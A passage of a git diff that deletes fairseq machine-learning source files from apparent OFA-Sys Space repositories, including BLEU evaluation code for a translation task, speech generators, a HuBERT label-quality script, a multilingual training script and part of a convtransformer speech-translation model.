- data_path,
- split,
- src,
- self.src_dict,
- tgt,
- self.tgt_dict,
- combine=combine,
- dataset_impl=self.cfg.dataset_impl,
- upsample_primary=self.cfg.upsample_primary,
- left_pad_source=self.cfg.left_pad_source,
- left_pad_target=self.cfg.left_pad_target,
- max_source_positions=self.cfg.max_source_positions,
- max_target_positions=self.cfg.max_target_positions,
- load_alignments=self.cfg.load_alignments,
- truncate_source=self.cfg.truncate_source,
- num_buckets=self.cfg.num_batch_buckets,
- shuffle=(split != "test"),
- pad_to_multiple=self.cfg.required_seq_len_multiple,
- )
-
- def build_dataset_for_inference(self, src_tokens, src_lengths, constraints=None):
- return LanguagePairDataset(
- src_tokens,
- src_lengths,
- self.source_dictionary,
- tgt_dict=self.target_dictionary,
- constraints=constraints,
- )
-
- def build_model(self, cfg):
- model = super().build_model(cfg)
- if self.cfg.eval_bleu:
- detok_args = json.loads(self.cfg.eval_bleu_detok_args)
- self.tokenizer = encoders.build_tokenizer(
- Namespace(tokenizer=self.cfg.eval_bleu_detok, **detok_args)
- )
-
- gen_args = json.loads(self.cfg.eval_bleu_args)
- self.sequence_generator = self.build_generator(
- [model], Namespace(**gen_args)
- )
- return model
-
- def valid_step(self, sample, model, criterion):
- loss, sample_size, logging_output = super().valid_step(sample, model, criterion)
- if self.cfg.eval_bleu:
- bleu = self._inference_with_bleu(self.sequence_generator, sample, model)
- logging_output["_bleu_sys_len"] = bleu.sys_len
- logging_output["_bleu_ref_len"] = bleu.ref_len
- # we split counts into separate entries so that they can be
- # summed efficiently across workers using fast-stat-sync
- assert len(bleu.counts) == EVAL_BLEU_ORDER
- for i in range(EVAL_BLEU_ORDER):
- logging_output["_bleu_counts_" + str(i)] = bleu.counts[i]
- logging_output["_bleu_totals_" + str(i)] = bleu.totals[i]
- return loss, sample_size, logging_output
-
- def reduce_metrics(self, logging_outputs, criterion):
- super().reduce_metrics(logging_outputs, criterion)
- if self.cfg.eval_bleu:
-
- def sum_logs(key):
- import torch
- result = sum(log.get(key, 0) for log in logging_outputs)
- if torch.is_tensor(result):
- result = result.cpu()
- return result
-
- counts, totals = [], []
- for i in range(EVAL_BLEU_ORDER):
- counts.append(sum_logs("_bleu_counts_" + str(i)))
- totals.append(sum_logs("_bleu_totals_" + str(i)))
-
- if max(totals) > 0:
- # log counts as numpy arrays -- log_scalar will sum them correctly
- metrics.log_scalar("_bleu_counts", np.array(counts))
- metrics.log_scalar("_bleu_totals", np.array(totals))
- metrics.log_scalar("_bleu_sys_len", sum_logs("_bleu_sys_len"))
- metrics.log_scalar("_bleu_ref_len", sum_logs("_bleu_ref_len"))
-
- def compute_bleu(meters):
- import inspect
- try:
- from sacrebleu.metrics import BLEU
- comp_bleu = BLEU.compute_bleu
- except ImportError:
- # compatibility API for sacrebleu 1.x
- import sacrebleu
- comp_bleu = sacrebleu.compute_bleu
-
- fn_sig = inspect.getfullargspec(comp_bleu)[0]
- if "smooth_method" in fn_sig:
- smooth = {"smooth_method": "exp"}
- else:
- smooth = {"smooth": "exp"}
- bleu = comp_bleu(
- correct=meters["_bleu_counts"].sum,
- total=meters["_bleu_totals"].sum,
- sys_len=meters["_bleu_sys_len"].sum,
- ref_len=meters["_bleu_ref_len"].sum,
- **smooth
- )
- return round(bleu.score, 2)
-
- metrics.log_derived("bleu", compute_bleu)
-
- def max_positions(self):
- """Return the max sentence length allowed by the task."""
- return (self.cfg.max_source_positions, self.cfg.max_target_positions)
-
- @property
- def source_dictionary(self):
- """Return the source :class:`~fairseq.data.Dictionary`."""
- return self.src_dict
-
- @property
- def target_dictionary(self):
- """Return the target :class:`~fairseq.data.Dictionary`."""
- return self.tgt_dict
-
- def _inference_with_bleu(self, generator, sample, model):
- import sacrebleu
-
- def decode(toks, escape_unk=False):
- s = self.tgt_dict.string(
- toks.int().cpu(),
- self.cfg.eval_bleu_remove_bpe,
- # The default unknown string in fairseq is ``, but
- # this is tokenized by sacrebleu as `< unk >`, inflating
- # BLEU scores. Instead, we use a somewhat more verbose
- # alternative that is unlikely to appear in the real
- # reference, but doesn't get split into multiple tokens.
- unk_string=("UNKNOWNTOKENINREF" if escape_unk else "UNKNOWNTOKENINHYP"),
- )
- if self.tokenizer:
- s = self.tokenizer.decode(s)
- return s
-
- gen_out = self.inference_step(generator, [model], sample, prefix_tokens=None)
- hyps, refs = [], []
- for i in range(len(gen_out)):
- hyps.append(decode(gen_out[i][0]["tokens"]))
- refs.append(
- decode(
- utils.strip_pad(sample["target"][i], self.tgt_dict.pad()),
- escape_unk=True, # don't count as matches to the hypo
- )
- )
- if self.cfg.eval_bleu_print_samples:
- logger.info("example hypothesis: " + hyps[0])
- logger.info("example reference: " + refs[0])
- if self.cfg.eval_tokenized_bleu:
- return sacrebleu.corpus_bleu(hyps, [refs], tokenize="none")
- else:
- return sacrebleu.corpus_bleu(hyps, [refs])
diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/speech_generator.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/speech_generator.py
deleted file mode 100644
index 8086e34d2b56fa808d0905b1a00e87e6736fcf04..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/speech_generator.py
+++ /dev/null
@@ -1,219 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-import torch
-import numpy as np
-
-from fairseq.data.audio.speech_to_text_dataset import S2TDataConfig
-
-
-class SpeechGenerator(object):
- def __init__(self, model, vocoder, data_cfg: S2TDataConfig):
- self.model = model
- self.vocoder = vocoder
- stats_npz_path = data_cfg.global_cmvn_stats_npz
- self.gcmvn_stats = None
- if stats_npz_path is not None:
- self.gcmvn_stats = np.load(stats_npz_path)
-
- def gcmvn_denormalize(self, x):
- # x: B x T x C
- if self.gcmvn_stats is None:
- return x
- mean = torch.from_numpy(self.gcmvn_stats["mean"]).to(x)
- std = torch.from_numpy(self.gcmvn_stats["std"]).to(x)
- assert len(x.shape) == 3 and mean.shape[0] == std.shape[0] == x.shape[2]
- x = x * std.view(1, 1, -1).expand_as(x)
- return x + mean.view(1, 1, -1).expand_as(x)
-
- def get_waveform(self, feat):
- # T x C -> T
- return None if self.vocoder is None else self.vocoder(feat).squeeze(0)
-
-
-class AutoRegressiveSpeechGenerator(SpeechGenerator):
- def __init__(
- self, model, vocoder, data_cfg, max_iter: int = 6000,
- eos_prob_threshold: float = 0.5,
- ):
- super().__init__(model, vocoder, data_cfg)
- self.max_iter = max_iter
- self.eos_prob_threshold = eos_prob_threshold
-
- @torch.no_grad()
- def generate(self, model, sample, has_targ=False, **kwargs):
- model.eval()
-
- src_tokens = sample["net_input"]["src_tokens"]
- src_lengths = sample["net_input"]["src_lengths"]
- bsz, src_len = src_tokens.size()
- n_frames_per_step = model.decoder.n_frames_per_step
- out_dim = model.decoder.out_dim
- raw_dim = out_dim // n_frames_per_step
-
- # initialize
- encoder_out = model.forward_encoder(src_tokens, src_lengths,
- speaker=sample["speaker"])
- incremental_state = {}
- feat, attn, eos_prob = [], [], []
- finished = src_tokens.new_zeros((bsz,)).bool()
- out_lens = src_lengths.new_zeros((bsz,)).long().fill_(self.max_iter)
-
- prev_feat_out = encoder_out["encoder_out"][0].new_zeros(bsz, 1, out_dim)
- for step in range(self.max_iter):
- cur_out_lens = out_lens.clone()
- cur_out_lens.masked_fill_(cur_out_lens.eq(self.max_iter), step + 1)
- _, cur_eos_out, cur_extra = model.forward_decoder(
- prev_feat_out, encoder_out=encoder_out,
- incremental_state=incremental_state,
- target_lengths=cur_out_lens, speaker=sample["speaker"], **kwargs
- )
- cur_eos_prob = torch.sigmoid(cur_eos_out).squeeze(2)
- feat.append(cur_extra['feature_out'])
- attn.append(cur_extra['attn'])
- eos_prob.append(cur_eos_prob)
-
- cur_finished = (cur_eos_prob.squeeze(1) > self.eos_prob_threshold)
- out_lens.masked_fill_((~finished) & cur_finished, step + 1)
- finished = finished | cur_finished
- if finished.sum().item() == bsz:
- break
- prev_feat_out = cur_extra['feature_out']
-
- feat = torch.cat(feat, dim=1)
- feat = model.decoder.postnet(feat) + feat
- eos_prob = torch.cat(eos_prob, dim=1)
- attn = torch.cat(attn, dim=2)
- alignment = attn.max(dim=1)[1]
-
- feat = feat.reshape(bsz, -1, raw_dim)
- feat = self.gcmvn_denormalize(feat)
-
- eos_prob = eos_prob.repeat_interleave(n_frames_per_step, dim=1)
- attn = attn.repeat_interleave(n_frames_per_step, dim=2)
- alignment = alignment.repeat_interleave(n_frames_per_step, dim=1)
- out_lens = out_lens * n_frames_per_step
-
- finalized = [
- {
- 'feature': feat[b, :out_len],
- 'eos_prob': eos_prob[b, :out_len],
- 'attn': attn[b, :, :out_len],
- 'alignment': alignment[b, :out_len],
- 'waveform': self.get_waveform(feat[b, :out_len]),
- }
- for b, out_len in zip(range(bsz), out_lens)
- ]
-
- if has_targ:
- assert sample["target"].size(-1) == out_dim
- tgt_feats = sample["target"].view(bsz, -1, raw_dim)
- tgt_feats = self.gcmvn_denormalize(tgt_feats)
- tgt_lens = sample["target_lengths"] * n_frames_per_step
- for b, (f, l) in enumerate(zip(tgt_feats, tgt_lens)):
- finalized[b]["targ_feature"] = f[:l]
- finalized[b]["targ_waveform"] = self.get_waveform(f[:l])
- return finalized
-
-
-class NonAutoregressiveSpeechGenerator(SpeechGenerator):
- @torch.no_grad()
- def generate(self, model, sample, has_targ=False, **kwargs):
- model.eval()
-
- bsz, max_src_len = sample["net_input"]["src_tokens"].size()
- n_frames_per_step = model.encoder.n_frames_per_step
- out_dim = model.encoder.out_dim
- raw_dim = out_dim // n_frames_per_step
-
- feat, out_lens, log_dur_out, _, _ = model(
- src_tokens=sample["net_input"]["src_tokens"],
- src_lengths=sample["net_input"]["src_lengths"],
- prev_output_tokens=sample["net_input"]["prev_output_tokens"],
- incremental_state=None,
- target_lengths=sample["target_lengths"],
- speaker=sample["speaker"]
- )
-
- feat = feat.view(bsz, -1, raw_dim)
- feat = self.gcmvn_denormalize(feat)
-
- dur_out = torch.clamp(
- torch.round(torch.exp(log_dur_out) - 1).long(), min=0
- )
-
- def get_dur_plot_data(d):
- r = []
- for i, dd in enumerate(d):
- r += [i + 1] * dd.item()
- return r
-
- out_lens = out_lens * n_frames_per_step
- finalized = [
- {
- 'feature': feat[b, :l] if l > 0 else feat.new_zeros([1, raw_dim]),
- 'waveform': self.get_waveform(
- feat[b, :l] if l > 0 else feat.new_zeros([1, raw_dim])
- ),
- 'attn': feat.new_tensor(get_dur_plot_data(dur_out[b])),
- }
- for b, l in zip(range(bsz), out_lens)
- ]
-
- if has_targ:
- tgt_feats = sample["target"].view(bsz, -1, raw_dim)
- tgt_feats = self.gcmvn_denormalize(tgt_feats)
- tgt_lens = sample["target_lengths"] * n_frames_per_step
- for b, (f, l) in enumerate(zip(tgt_feats, tgt_lens)):
- finalized[b]["targ_feature"] = f[:l]
- finalized[b]["targ_waveform"] = self.get_waveform(f[:l])
- return finalized
-
-
-class TeacherForcingAutoRegressiveSpeechGenerator(AutoRegressiveSpeechGenerator):
- @torch.no_grad()
- def generate(self, model, sample, has_targ=False, **kwargs):
- model.eval()
-
- src_tokens = sample["net_input"]["src_tokens"]
- src_lens = sample["net_input"]["src_lengths"]
- prev_out_tokens = sample["net_input"]["prev_output_tokens"]
- tgt_lens = sample["target_lengths"]
- n_frames_per_step = model.decoder.n_frames_per_step
- raw_dim = model.decoder.out_dim // n_frames_per_step
- bsz = src_tokens.shape[0]
-
- feat, eos_prob, extra = model(
- src_tokens, src_lens, prev_out_tokens, incremental_state=None,
- target_lengths=tgt_lens, speaker=sample["speaker"]
- )
-
- attn = extra["attn"] # B x T_s x T_t
- alignment = attn.max(dim=1)[1]
- feat = feat.reshape(bsz, -1, raw_dim)
- feat = self.gcmvn_denormalize(feat)
- eos_prob = eos_prob.repeat_interleave(n_frames_per_step, dim=1)
- attn = attn.repeat_interleave(n_frames_per_step, dim=2)
- alignment = alignment.repeat_interleave(n_frames_per_step, dim=1)
- tgt_lens = sample["target_lengths"] * n_frames_per_step
-
- finalized = [
- {
- 'feature': feat[b, :tgt_len],
- 'eos_prob': eos_prob[b, :tgt_len],
- 'attn': attn[b, :, :tgt_len],
- 'alignment': alignment[b, :tgt_len],
- 'waveform': self.get_waveform(feat[b, :tgt_len]),
- }
- for b, tgt_len in zip(range(bsz), tgt_lens)
- ]
-
- if has_targ:
- tgt_feats = sample["target"].view(bsz, -1, raw_dim)
- tgt_feats = self.gcmvn_denormalize(tgt_feats)
- for b, (f, l) in enumerate(zip(tgt_feats, tgt_lens)):
- finalized[b]["targ_feature"] = f[:l]
- finalized[b]["targ_waveform"] = self.get_waveform(f[:l])
- return finalized
diff --git a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/tasks/frm_text_to_speech.py b/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/tasks/frm_text_to_speech.py
deleted file mode 100644
index 1fa9b0f83e742aefce764e2858a81f99db911afd..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-Image_Caption/fairseq/fairseq/tasks/frm_text_to_speech.py
+++ /dev/null
@@ -1,56 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-import logging
-
-from fairseq.data.audio.frm_text_to_speech_dataset import FrmTextToSpeechDatasetCreator
-from fairseq.tasks import register_task
-from fairseq.tasks.text_to_speech import TextToSpeechTask
-
-
-logging.basicConfig(
- format='%(asctime)s | %(levelname)s | %(name)s | %(message)s',
- datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO
-)
-logger = logging.getLogger(__name__)
-
-
-@register_task('frm_text_to_speech')
-class FrmTextToSpeechTask(TextToSpeechTask):
- @staticmethod
- def add_args(parser):
- TextToSpeechTask.add_args(parser)
- parser.add_argument(
- "--do_chunk", action="store_true", help="train on chunks"
- )
- parser.add_argument("--chunk_bound", default=-1, type=int)
- parser.add_argument("--chunk_init", default=50, type=int)
- parser.add_argument("--chunk_incr", default=5, type=int)
- parser.add_argument("--add_eos", action="store_true")
- parser.add_argument("--dedup", action="store_true")
- parser.add_argument("--ref_fpu", default=-1, type=float)
-
- def load_dataset(self, split, **unused_kwargs):
- is_train_split = split.startswith("train")
- pre_tokenizer = self.build_tokenizer(self.args)
- bpe_tokenizer = self.build_bpe(self.args)
- self.datasets[split] = FrmTextToSpeechDatasetCreator.from_tsv(
- self.args.data,
- self.data_cfg,
- split,
- self.src_dict,
- pre_tokenizer,
- bpe_tokenizer,
- is_train_split=is_train_split,
- n_frames_per_step=self.args.n_frames_per_step,
- speaker_to_id=self.speaker_to_id,
- do_chunk=self.args.do_chunk,
- chunk_bound=self.args.chunk_bound,
- chunk_init=self.args.chunk_init,
- chunk_incr=self.args.chunk_incr,
- add_eos=self.args.add_eos,
- dedup=self.args.dedup,
- ref_fpu=self.args.ref_fpu
- )
diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/hubert/measure_teacher_quality.py b/spaces/OFA-Sys/OFA-vqa/fairseq/examples/hubert/measure_teacher_quality.py
deleted file mode 100644
index 92279b2214bb2ba4a99aea92098907ef4f55821b..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/hubert/measure_teacher_quality.py
+++ /dev/null
@@ -1,241 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-import numpy as np
-import os.path as op
-import re
-from tabulate import tabulate
-from collections import Counter
-
-
-def comp_purity(p_xy, axis):
- max_p = p_xy.max(axis=axis)
- marg_p = p_xy.sum(axis=axis)
- indv_pur = max_p / marg_p
- aggr_pur = max_p.sum()
- return indv_pur, aggr_pur
-
-
-def comp_entropy(p):
- return (-p * np.log(p + 1e-8)).sum()
-
-
-def comp_norm_mutual_info(p_xy):
- p_x = p_xy.sum(axis=1, keepdims=True)
- p_y = p_xy.sum(axis=0, keepdims=True)
- pmi = np.log(p_xy / np.matmul(p_x, p_y) + 1e-8)
- mi = (p_xy * pmi).sum()
- h_x = comp_entropy(p_x)
- h_y = comp_entropy(p_y)
- return mi, mi / h_x, mi / h_y, h_x, h_y
-
-
-def pad(labs, n):
- if n == 0:
- return np.array(labs)
- return np.concatenate([[labs[0]] * n, labs, [labs[-1]] * n])
-
-
-def comp_avg_seg_dur(labs_list):
- n_frms = 0
- n_segs = 0
- for labs in labs_list:
- labs = np.array(labs)
- edges = np.zeros(len(labs)).astype(bool)
- edges[0] = True
- edges[1:] = labs[1:] != labs[:-1]
- n_frms += len(edges)
- n_segs += edges.astype(int).sum()
- return n_frms / n_segs
-
-
-def comp_joint_prob(uid2refs, uid2hyps):
- """
- Args:
- pad: padding for spliced-feature derived labels
- """
- cnts = Counter()
- skipped = []
- abs_frmdiff = 0
- for uid in uid2refs:
- if uid not in uid2hyps:
- skipped.append(uid)
- continue
- refs = uid2refs[uid]
- hyps = uid2hyps[uid]
- abs_frmdiff += abs(len(refs) - len(hyps))
- min_len = min(len(refs), len(hyps))
- refs = refs[:min_len]
- hyps = hyps[:min_len]
- cnts.update(zip(refs, hyps))
- tot = sum(cnts.values())
-
- ref_set = sorted({ref for ref, _ in cnts.keys()})
- hyp_set = sorted({hyp for _, hyp in cnts.keys()})
- ref2pid = dict(zip(ref_set, range(len(ref_set))))
- hyp2lid = dict(zip(hyp_set, range(len(hyp_set))))
- # print(hyp_set)
- p_xy = np.zeros((len(ref2pid), len(hyp2lid)), dtype=float)
- for (ref, hyp), cnt in cnts.items():
- p_xy[ref2pid[ref], hyp2lid[hyp]] = cnt
- p_xy /= p_xy.sum()
- return p_xy, ref2pid, hyp2lid, tot, abs_frmdiff, skipped
-
-
-def read_phn(tsv_path, rm_stress=True):
- uid2phns = {}
- with open(tsv_path) as f:
- for line in f:
- uid, phns = line.rstrip().split("\t")
- phns = phns.split(",")
- if rm_stress:
- phns = [re.sub("[0-9]", "", phn) for phn in phns]
- uid2phns[uid] = phns
- return uid2phns
-
-
-def read_lab(tsv_path, lab_path, pad_len=0, upsample=1):
- """
- tsv is needed to retrieve the uids for the labels
- """
- with open(tsv_path) as f:
- f.readline()
- uids = [op.splitext(op.basename(line.rstrip().split()[0]))[0] for line in f]
- with open(lab_path) as f:
- labs_list = [pad(line.rstrip().split(), pad_len).repeat(upsample) for line in f]
- assert len(uids) == len(labs_list)
- return dict(zip(uids, labs_list))
-
-
-def main_lab_lab(
- tsv_dir,
- lab_dir,
- lab_name,
- lab_sets,
- ref_dir,
- ref_name,
- pad_len=0,
- upsample=1,
- verbose=False,
-):
- # assume tsv_dir is the same for both the reference and the hypotheses
- tsv_dir = lab_dir if tsv_dir is None else tsv_dir
-
- uid2refs = {}
- for s in lab_sets:
- uid2refs.update(read_lab(f"{tsv_dir}/{s}.tsv", f"{ref_dir}/{s}.{ref_name}"))
-
- uid2hyps = {}
- for s in lab_sets:
- uid2hyps.update(
- read_lab(
- f"{tsv_dir}/{s}.tsv", f"{lab_dir}/{s}.{lab_name}", pad_len, upsample
- )
- )
- _main(uid2refs, uid2hyps, verbose)
-
-
-def main_phn_lab(
- tsv_dir,
- lab_dir,
- lab_name,
- lab_sets,
- phn_dir,
- phn_sets,
- pad_len=0,
- upsample=1,
- verbose=False,
-):
- uid2refs = {}
- for s in phn_sets:
- uid2refs.update(read_phn(f"{phn_dir}/{s}.tsv"))
-
- uid2hyps = {}
- tsv_dir = lab_dir if tsv_dir is None else tsv_dir
- for s in lab_sets:
- uid2hyps.update(
- read_lab(
- f"{tsv_dir}/{s}.tsv", f"{lab_dir}/{s}.{lab_name}", pad_len, upsample
- )
- )
- _main(uid2refs, uid2hyps, verbose)
-
-
-def _main(uid2refs, uid2hyps, verbose):
- (p_xy, ref2pid, hyp2lid, tot, frmdiff, skipped) = comp_joint_prob(
- uid2refs, uid2hyps
- )
- ref_pur_by_hyp, ref_pur = comp_purity(p_xy, axis=0)
- hyp_pur_by_ref, hyp_pur = comp_purity(p_xy, axis=1)
- (mi, mi_norm_by_ref, mi_norm_by_hyp, h_ref, h_hyp) = comp_norm_mutual_info(p_xy)
- outputs = {
- "ref pur": ref_pur,
- "hyp pur": hyp_pur,
- "H(ref)": h_ref,
- "H(hyp)": h_hyp,
- "MI": mi,
- "MI/H(ref)": mi_norm_by_ref,
- "ref segL": comp_avg_seg_dur(uid2refs.values()),
- "hyp segL": comp_avg_seg_dur(uid2hyps.values()),
- "p_xy shape": p_xy.shape,
- "frm tot": tot,
- "frm diff": frmdiff,
- "utt tot": len(uid2refs),
- "utt miss": len(skipped),
- }
- print(tabulate([outputs.values()], outputs.keys(), floatfmt=".4f"))
-
-
-if __name__ == "__main__":
- """
- compute quality of labels with respect to phone or another labels if set
- """
- import argparse
-
- parser = argparse.ArgumentParser()
- parser.add_argument("tsv_dir")
- parser.add_argument("lab_dir")
- parser.add_argument("lab_name")
- parser.add_argument("--lab_sets", default=["valid"], type=str, nargs="+")
- parser.add_argument(
- "--phn_dir",
- default="/checkpoint/wnhsu/data/librispeech/960h/fa/raw_phn/phone_frame_align_v1",
- )
- parser.add_argument(
- "--phn_sets", default=["dev-clean", "dev-other"], type=str, nargs="+"
- )
- parser.add_argument("--pad_len", default=0, type=int, help="padding for hypotheses")
- parser.add_argument(
- "--upsample", default=1, type=int, help="upsample factor for hypotheses"
- )
- parser.add_argument("--ref_lab_dir", default="")
- parser.add_argument("--ref_lab_name", default="")
- parser.add_argument("--verbose", action="store_true")
- args = parser.parse_args()
-
- if args.ref_lab_dir and args.ref_lab_name:
- main_lab_lab(
- args.tsv_dir,
- args.lab_dir,
- args.lab_name,
- args.lab_sets,
- args.ref_lab_dir,
- args.ref_lab_name,
- args.pad_len,
- args.upsample,
- args.verbose,
- )
- else:
- main_phn_lab(
- args.tsv_dir,
- args.lab_dir,
- args.lab_name,
- args.lab_sets,
- args.phn_dir,
- args.phn_sets,
- args.pad_len,
- args.upsample,
- args.verbose,
- )
diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/multilingual/train_multilingual_model.sh b/spaces/OFA-Sys/OFA-vqa/fairseq/examples/multilingual/train_multilingual_model.sh
deleted file mode 100644
index cc050bd3f02de8a2f303737f187442d2eb80e4ef..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-vqa/fairseq/examples/multilingual/train_multilingual_model.sh
+++ /dev/null
@@ -1,28 +0,0 @@
-#!/bin/bash
-# Copyright (c) Facebook, Inc. and its affiliates.
-# All rights reserved.
-#
-# This source code is licensed under the license found in the
-# LICENSE file in the root directory of this source tree.
-
-path_2_data=$1 # which contains binarized data for each directions
-lang_list=$2 #
-lang_pairs=$3 #a list language pairs to train multilingual models, e.g. "en-fr,en-cs,fr-en,cs-en"
-
-fairseq-train "$path_2_data" \
- --encoder-normalize-before --decoder-normalize-before \
- --arch transformer --layernorm-embedding \
- --task translation_multi_simple_epoch \
- --sampling-method "temperature" \
- --sampling-temperature 1.5 \
- --encoder-langtok "src" \
- --decoder-langtok \
- --lang-dict "$lang_list" \
- --lang-pairs "$lang_pairs" \
- --criterion label_smoothed_cross_entropy --label-smoothing 0.2 \
- --optimizer adam --adam-eps 1e-06 --adam-betas '(0.9, 0.98)' \
- --lr-scheduler inverse_sqrt --lr 3e-05 --warmup-updates 2500 --max-update 40000 \
- --dropout 0.3 --attention-dropout 0.1 --weight-decay 0.0 \
- --max-tokens 1024 --update-freq 2 \
- --save-interval 1 --save-interval-updates 5000 --keep-interval-updates 10 --no-epoch-checkpoints \
- --seed 222 --log-format simple --log-interval 2
diff --git a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/speech_to_text/convtransformer.py b/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/speech_to_text/convtransformer.py
deleted file mode 100644
index eba000d7b0826d2ecf5dc471156f8f8cc9f5e402..0000000000000000000000000000000000000000
--- a/spaces/OFA-Sys/OFA-vqa/fairseq/fairseq/models/speech_to_text/convtransformer.py
+++ /dev/null
@@ -1,448 +0,0 @@
-#!/usr/bin/env python3
-
-import logging
-import math
-from typing import Dict, List, Optional, Tuple
-
-import torch
-import torch.nn as nn
-import torch.nn.functional as F
-from fairseq import checkpoint_utils, utils
-from fairseq.data.data_utils import lengths_to_padding_mask
-from fairseq.models import (
- FairseqEncoder,
- FairseqEncoderDecoderModel,
- register_model,
- register_model_architecture,
-)
-from fairseq.models.transformer import Embedding, TransformerDecoder
-from fairseq.modules import LayerNorm, PositionalEmbedding, TransformerEncoderLayer
-from torch import Tensor
-
-logger = logging.getLogger(__name__)
-
-
-@register_model("convtransformer")
-class ConvTransformerModel(FairseqEncoderDecoderModel):
- """
- Transformer-based Speech translation model from ESPNet-ST
- https://arxiv.org/abs/2004.10234
- """
-
- def __init__(self, encoder, decoder):
- super().__init__(encoder, decoder)
-
- @staticmethod
- def add_args(parser):
- """Add model-specific arguments to the parser."""
- parser.add_argument(
- "--input-feat-per-channel",
- type=int,
- metavar="N",
- help="encoder input dimension per input channel",
- )
- parser.add_argument(
- "--activation-fn",
- choices=utils.get_available_activation_fns(),
- help="activation function to use",
- )
- parser.add_argument(
- "--dropout", type=float, metavar="D", help="dropout probability"
- )
- parser.add_argument(
- "--attention-dropout",
- type=float,
- metavar="D",
- help="dropout probability for attention weights",
- )
- parser.add_argument(
- "--activation-dropout",
- "--relu-dropout",
- type=float,
- metavar="D",
- help="dropout probability after activation in FFN.",
- )
- parser.add_argument(
- "--encoder-embed-dim",
- type=int,
- metavar="N",
- help="encoder embedding dimension",
- )
- parser.add_argument(
- "--encoder-ffn-embed-dim",
- type=int,
- metavar="N",
- help="encoder embedding dimension for FFN",
- )
- parser.add_argument(
- "--encoder-layers", type=int, metavar="N", help="num encoder layers"
- )
- parser.add_argument(
- "--encoder-attention-heads",
- type=int,
- metavar="N",
- help="num encoder attention heads",
- )
- parser.add_argument(
- "--encoder-normalize-before",
- action="store_true",
- help="apply layernorm before each encoder block",
- )
- parser.add_argument(
- "--decoder-embed-dim",
- type=int,
- metavar="N",
- help="decoder embedding dimension",
- )
- parser.add_argument(
- "--decoder-ffn-embed-dim",
- type=int,
- metavar="N",
- help="decoder embedding dimension for FFN",
- )
- parser.add_argument(
- "--decoder-layers", type=int, metavar="N", help="num decoder layers"
- )
- parser.add_argument(
- "--decoder-attention-heads",
- type=int,
- metavar="N",
- help="num decoder attention heads",
- )
- parser.add_argument(
- "--decoder-normalize-before",
- action="store_true",
- help="apply layernorm before each decoder block",
- )
- parser.add_argument(
- "--decoder-output-dim",
- type=int,
- metavar="N",
- help="decoder output dimension (extra linear layer if different from decoder embed dim)",
- )
- parser.add_argument(
- "--share-decoder-input-output-embed",
- action="store_true",
- help="share decoder input and output embeddings",
- )
- parser.add_argument(
- "--layernorm-embedding",
- action="store_true",
- help="add layernorm to embedding",
- )
- parser.add_argument(
- "--no-scale-embedding",
- action="store_true",
- help="if True, dont scale embeddings",
- )
- parser.add_argument(
- "--load-pretrained-encoder-from",
- type=str,
- metavar="STR",
- help="model to take encoder weights from (for initialization)",
- )
- parser.add_argument(
- "--load-pretrained-decoder-from",
- type=str,
- metavar="STR",
- help="model to take decoder weights from (for initialization)",
- )
- parser.add_argument(
- "--conv-out-channels",
- type=int,
- metavar="INT",
- help="the number of output channels of conv layer",
- )
-
- @classmethod
- def build_encoder(cls, args):
- encoder = ConvTransformerEncoder(args)
- if getattr(args, "load_pretrained_encoder_from", None):
- encoder = checkpoint_utils.load_pretrained_component_from_model(
- component=encoder, checkpoint=args.load_pretrained_encoder_from
- )
- return encoder
-
- @classmethod
- def build_decoder(cls, args, task, embed_tokens):
- decoder = TransformerDecoderNoExtra(args, task.target_dictionary, embed_tokens)
- if getattr(args, "load_pretrained_decoder_from", None):
- decoder = checkpoint_utils.load_pretrained_component_from_model(
- component=decoder, checkpoint=args.load_pretrained_decoder_from
- )
- return decoder
-
- @classmethod
- def build_model(cls, args, task):
- """Build a new model instance."""
-
- # make sure all arguments are present in older models
- base_architecture(args)
-
- def build_embedding(dictionary, embed_dim):
- num_embeddings = len(dictionary)
- padding_idx = dictionary.pad()
- return Embedding(num_embeddings, embed_dim, padding_idx)
-
- decoder_embed_tokens = build_embedding(
- task.target_dictionary, args.decoder_embed_dim
- )
- encoder = cls.build_encoder(args)
- decoder = cls.build_decoder(args, task, decoder_embed_tokens)
- return cls(encoder, decoder)
-
- @staticmethod
- @torch.jit.unused
- def set_batch_first(lprobs):
- lprobs.batch_first = True
-
- def get_normalized_probs(
- self,
- net_output: Tuple[Tensor, Optional[Dict[str, List[Optional[Tensor]]]]],
- log_probs: bool,
- sample: Optional[Dict[str, Tensor]] = None,
- ):
- # net_output['encoder_out'] is a (B, T, D) tensor
- lprobs = self.get_normalized_probs_scriptable(net_output, log_probs, sample)
- if self.training:
- self.set_batch_first(lprobs)
- return lprobs
-
- def output_layout(self):
- return "BTD"
-
- """
- The forward method inherited from the base class has a **kwargs argument in
- its input, which is not supported in torchscript. This method overrites the forward
- method definition without **kwargs.
- """
-
- def forward(self, src_tokens, src_lengths, prev_output_tokens):
- encoder_out = self.encoder(src_tokens=src_tokens, src_lengths=src_lengths)
- decoder_out = self.decoder(
- prev_output_tokens=prev_output_tokens, encoder_out=encoder_out
- )
- return decoder_out
-
-
-class ConvTransformerEncoder(FairseqEncoder):
- """Conv + Transformer encoder"""
-
- def __init__(self, args):
- """Construct an Encoder object."""
- super().__init__(None)
-
- self.dropout = args.dropout
- self.embed_scale = (
- 1.0 if args.no_scale_embedding else math.sqrt(args.encoder_embed_dim)
- )
